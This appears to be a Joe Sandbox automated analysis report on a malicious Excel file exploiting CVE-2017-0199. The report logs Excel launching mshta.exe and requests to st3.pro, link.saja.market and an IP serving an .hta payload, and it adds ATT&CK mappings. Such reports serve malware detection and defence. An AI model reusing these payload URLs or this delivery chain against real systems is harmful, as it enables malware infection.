Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49704 -> 13.107.246.67:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49706 -> 13.107.246.67:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49705 -> 13.107.246.67:443
Source: global trafficHTTP traffic detected: GET /YjzNwpD?&slope=needy&robert=grotesque&crest=fragile&agreemen HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: st3.proConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /qORxZFFRU3 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: link.saja.market
Source: global trafficHTTP traffic detected: GET /xampp/umo/ncr/onceufeelgood.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 172.245.191.88
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.191.88
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.191.88
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.191.88
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.191.88
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.191.88
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.191.88
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.191.88
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.191.88
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.191.88
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.191.88
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.191.88
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.191.88
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.191.88
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /YjzNwpD?&slope=needy&robert=grotesque&crest=fragile&agreemen HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: st3.proConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /qORxZFFRU3 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: link.saja.market
Source: global trafficHTTP traffic detected: GET /rules/excel.exe-Production-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /xampp/umo/ncr/onceufeelgood.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 172.245.191.88
Source: global trafficDNS traffic detected: DNS query: st3.pro
Source: global trafficDNS traffic detected: DNS query: link.saja.market
Source: global trafficDNS traffic detected: DNS query: otelrules.svc.static.microsoft
Source: COTA#U00c7#U00c3O.xls, 59920000.0.drString found in binary or memory: https://st3.pro/YjzNwpD?&slope=needy&robert=grotesque&crest=fragile&agreemen07su
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: unknownHTTPS traffic detected: 5.161.200.29:443 -> 192.168.2.8:49700 version: TLS 1.2
Source: unknownHTTPS traffic detected: 3.39.89.152:443 -> 192.168.2.8:49702 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.67:443 -> 192.168.2.8:49704 version: TLS 1.2

System Summary

barindex
Source: COTA#U00c7#U00c3O.xlsOLE: Microsoft Excel 2007+
Source: 59920000.0.drOLE: Microsoft Excel 2007+
Source: COTA#U00c7#U00c3O.xlsOLE indicator, VBA macros: true
Source: COTA#U00c7#U00c3O.xlsStream path 'MBD006B205A/\x1Ole' : https://st3.pro/YjzNwpD?&slope=needy&robert=grotesque&crest=fragile&agreemen07suB'4>Ob<"z@`etm_I]H!Lc^CGHKA5S<4,E#:euo*XaK1LvLBy9CH3JJKQ17Rk34HdztDkfKgrmsD8ayfpMkL7MDOhJneu8GV14DJPljyksSx4EVja5eSBmGcKSRZj8zsDmZS4LTcr4xlqIsedrY28TorcdYEiuCerxgKtEKj8Qb4fs5hOEPsa7BW10AprosvPmpourG5TFCoVW4mcid2gkhp6jbvweqSgHYEWunT9ch7wNde3vA*p*]TI9A`'STB+B
Source: 59920000.0.drStream path 'MBD006B205A/\x1Ole' : https://st3.pro/YjzNwpD?&slope=needy&robert=grotesque&crest=fragile&agreemen07suB'4>Ob<"z@`etm_I]H!Lc^CGHKA5S<4,E#:euo*XaK1LvLBy9CH3JJKQ17Rk34HdztDkfKgrmsD8ayfpMkL7MDOhJneu8GV14DJPljyksSx4EVja5eSBmGcKSRZj8zsDmZS4LTcr4xlqIsedrY28TorcdYEiuCerxgKtEKj8Qb4fs5hOEPsa7BW10AprosvPmpourG5TFCoVW4mcid2gkhp6jbvweqSgHYEWunT9ch7wNde3vA*p*]TI9A`'STB+B
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: classification engineClassification label: mal60.expl.winXLS@6/8@3/4
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\59920000Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{63A076A9-26BE-4216-97E3-F39B36CC206B} - OProcSessId.datJump to behavior
Source: COTA#U00c7#U00c3O.xlsOLE indicator, Workbook stream: true
Source: 59920000.0.drOLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: COTA#U00c7#U00c3O.xlsVirustotal: Detection: 25%
Source: COTA#U00c7#U00c3O.xlsReversingLabs: Detection: 21%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\COTA#U00c7#U00c3O.xls"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -EmbeddingJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: c2r32.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: 59920000.0.drInitial sample: OLE indicators vbamacros = False
Source: COTA#U00c7#U00c3O.xlsInitial sample: OLE indicators encrypted = True
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: COTA#U00c7#U00c3O.xlsStream path 'Workbook' entropy: 7.99836815431 (max. 8.0)
Source: 59920000.0.drStream path 'Workbook' entropy: 7.99849101198 (max. 8.0)
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 841Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts13
Exploitation for Client Execution
1
Scripting
1
Process Injection
2
Masquerading
OS Credential Dumping1
Process Discovery
Remote Services1
Email Collection
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
DLL Side-Loading
1
Virtualization/Sandbox Evasion
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Extra Window Memory Injection
1
Process Injection
Security Account Manager1
Application Window Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDS1
File and Directory Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets2
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Extra Window Memory Injection
Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
COTA#U00c7#U00c3O.xls26%VirustotalBrowse
COTA#U00c7#U00c3O.xls21%ReversingLabsDocument-Excel.Exploit.CVE-2017-0199
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://st3.pro/YjzNwpD?&slope=needy&robert=grotesque&crest=fragile&agreemen0%Avira URL Cloudsafe
https://link.saja.market/qORxZFFRU30%Avira URL Cloudsafe
https://st3.pro/YjzNwpD?&slope=needy&robert=grotesque&crest=fragile&agreemen07su0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.214.172
truefalse
    high
    st3.pro
    5.161.200.29
    truefalse
      high
      s-0005.dual-s-msedge.net
      52.123.129.14
      truefalse
        high
        s-part-0039.t-0009.t-msedge.net
        13.107.246.67
        truefalse
          high
          service-eks-nlb-public-0b7cb0a32741e125.elb.ap-northeast-2.amazonaws.com
          3.39.89.152
          truefalse
            high
            otelrules.svc.static.microsoft
            unknown
            unknownfalse
              high
              link.saja.market
              unknown
              unknownfalse
                high
                NameMaliciousAntivirus DetectionReputation
                https://otelrules.svc.static.microsoft/rules/excel.exe-Production-v19.bundlefalse
                  high
                  https://st3.pro/YjzNwpD?&slope=needy&robert=grotesque&crest=fragile&agreemenfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://otelrules.svc.static.microsoft/rules/rule120607v1s19.xmlfalse
                    high
                    https://otelrules.svc.static.microsoft/rules/rule120603v8s19.xmlfalse
                      high
                      https://link.saja.market/qORxZFFRU3false
                      • Avira URL Cloud: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://st3.pro/YjzNwpD?&slope=needy&robert=grotesque&crest=fragile&agreemen07suCOTA#U00c7#U00c3O.xls, 59920000.0.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      3.39.89.152
                      service-eks-nlb-public-0b7cb0a32741e125.elb.ap-northeast-2.amazonaws.comUnited States
                      8987AMAZONEXPANSIONGBfalse
                      172.245.191.88
                      unknownUnited States
                      36352AS-COLOCROSSINGUSfalse
                      13.107.246.67
                      s-part-0039.t-0009.t-msedge.netUnited States
                      8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                      5.161.200.29
                      st3.proGermany
                      24940HETZNER-ASDEfalse
                      Joe Sandbox version:42.0.0 Malachite
                      Analysis ID:1634262
                      Start date and time:2025-03-10 21:32:23 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 5m 35s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:defaultwindowsofficecookbook.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Run name:Without Instrumentation
                      Number of analysed new started processes analysed:21
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:COTA#U00c7#U00c3O.xls
                      renamed because original name is a hash value
                      Original Sample Name:COTAO.xls
                      Detection:MAL
                      Classification:mal60.expl.winXLS@6/8@3/4
                      EGA Information:Failed
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0
                      Cookbook Comments:
                      • Found application associated with file extension: .xls
                      • Found Word or Excel or PowerPoint or XPS Viewer
                      • Attach to Office via COM
                      • Active ActiveX Object
